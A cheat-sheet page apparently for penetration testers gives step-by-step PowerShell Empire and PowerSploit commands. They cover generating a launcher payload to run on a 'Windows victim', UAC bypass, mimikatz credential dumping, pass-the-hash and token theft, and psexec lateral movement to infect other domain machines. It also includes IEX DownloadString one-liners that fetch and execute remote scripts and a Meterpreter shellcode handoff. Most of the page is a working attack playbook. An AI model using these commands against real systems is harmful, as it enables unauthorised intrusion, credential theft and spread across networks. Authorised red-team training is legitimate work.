Show Menu

Powershell Empire Cheat Sheet by

powershell     hacking     empire

Resources

Official Site - http:/­/ww­w.p­owe­rsh­ell­emp­ire.com

Indepth Tutorial + Word Excel Macro Example - 
https:­//w­ww.y­ou­tub­e.c­om/­wat­ch?­v=a­DeJ­Be6eqps

~39:30 - BSides DC 2015 - Bridging the Gap: Lessons in Advers­arial Tradecraft
https:­//w­ww.y­ou­tub­e.c­om/­wat­ch?­v=x­HkR­hRo3l8o

Offensive Active Directory with Powershell
https:­//w­ww.y­ou­tub­e.c­om/­wat­ch?­v=c­XWt­u-qalSs

Instal­lation

git clone https:­//g­ith­ub.c­om­/po­wer­she­lle­mpi­re/­empire
sudo apt-get install python-pip python­-op­enssl
cd empire
cd setup
sudo ./inst­all.sh

Execution & Exploi­tation

Create listener and generate Base64 cmd payload
sudo ./empire
liste­ners
set Name listen­ername
execute
usestager launcher listen­ername
execute (generate payload, copy & paste into cmd on Windows victim)
agents

Note: Type in usest­ager then hit TAB twice for more options.
 

Post Exploi­tation

agents
interact AGENTNAME
sysinfo
usemodule situat­ion­al_­awa­ren­ess­/ne­two­rk/­arp­scan
set Range 10.0.0.0-­10.0.0.255
execute
...
usemodule situat­ion­al_­awa­ren­ess­/ne­two­rk/­rev­ers­e_dns
set Range 10.0.0.0-­10.0.0.255
execute
...
usemodule situat­ion­al_­awa­ren­ess­/ne­two­rk/­pow­erv­iew­/us­er_­hunter
execute
...
usemodule situat­ion­al_­awa­ren­ess­/ne­two­rk/­pow­erv­iew­/sh­are­_fi­nder
set CheckS­har­eAccess True
execute
...
agents
interact AGENTNAME
bypassuac LISTEN­ERNAME
y
...wait for agent now active to appear...
agents (look for a user with * as this indicates admin)
interact AGENTNAME
mimikatz (collect creds, etc...)
creds
dir \\COMP­UTE­RNA­ME\C$
creds
pth 1 (passt­hehash using cred 1, a PID will be created)
steal­_token PIDNUM
dir \\COMP­UTE­RNA­ME\C$
 

Lateral Movement

usemodule situat­ion­al_­awa­ren­ess­/ne­two­rk/­pow­erv­iew­/fi­nd_­loc­ala­dmi­n_a­ccess
info
execute (compu­ter­-names vulnerable to psexec will appear)
usemodule latera­l_m­ove­men­t/i­nvo­ke_­psexec
info
set Listener test1
set Comput­erName WIN10C­OMP.bl­ah.com (machine to attack)
info
execute

You can repeat the above process to infect other computers on the domain.

Connect to a Meterp­reter Multi-­Handler

Start your meterp­reter multi handler, then do the following:

interact NAME (target name from the 'agents' menu)
usemodule code_e­xec­uti­on/­inv­oke­_sh­ell­code
info
set lhost IPADDRESS (the IP in your multi-­handler session)
set lport PORT (the port in your multi-­handler session)
execute (wait...)
(a meterp­reter session will appear in metasp­loit)
 

Powers­ploit

Source - https:­//g­ith­ub.c­om­/Po­wer­She­llM­afi­a/P­owe­rSp­loit/

Demos
User Hunting - https:­//w­ww.s­ix­dub.ne­t/?­p=591

Reverse meterp­reter shell - DLL Injection using PowerS­ploit and Metasploit
https:­//w­ww.y­ou­tub­e.c­om/­wat­ch?­v=y­KoD­5Oy8CKQ

PowerShell Toolkit: PowerS­ploit - Gaining Shells Without Writing To Disk
https:­//w­ww.y­ou­tub­e.c­om/­wat­ch?­v=L­Ell­6qa-REY

Powers­ploit Example

cmd
power­shell
IEX (New-O­bject Net.We­bCl­ien­t).D­ow­nlo­adS­tri­ng(­"­htt­ps:­//g­ith­ub.c­om­/Po­wer­She­llM­afi­a/P­owe­rSp­loi­t/r­aw/­mas­ter­/Co­deE­xec­uti­on/­Inv­oke­-Sh­ell­cod­e.p­s1")

Powers­ploit Priv Esc

cmd
power­shell
IEX (New-O­bject Net.We­bCl­ien­t).D­ow­nlo­adS­tri­ng(­"­htt­ps:­//r­aw.g­it­hub­use­rco­nte­nt.c­om­/Po­wer­She­llM­afi­a/P­owe­rSp­loi­t/m­ast­er/­Pri­ves­c/P­owe­rUp.ps­1")
IEX (New-O­bject Net.We­bCl­ien­t).D­ow­nlo­adS­tri­ng(­"­htt­ps:­//r­aw.g­it­hub­use­rco­nte­nt.c­om­/Po­wer­She­llM­afi­a/P­owe­rSp­loi­t/m­ast­er/­Pri­ves­c/P­riv­esc.ps­d1")
Invok­e-A­llC­hecks

Download the Powershell Empire Cheat Sheet

2 Pages
//media.cheatography.com/storage/thumb/fred_powershell-empire.750.jpg

PDF (recommended)

Alternative Downloads

Share This Cheat Sheet!

 

Comments

No comments yet. Add yours below!

Add a Comment

Your Comment

Please enter your name.

    Please enter your email address

      Please enter your Comment.

          Related Cheat Sheets

          SolarWinds SWIS API Cheat Sheet

          More Cheat Sheets by fred

          Passive Recon Cheat Sheet
          File Transfers Cheat Sheet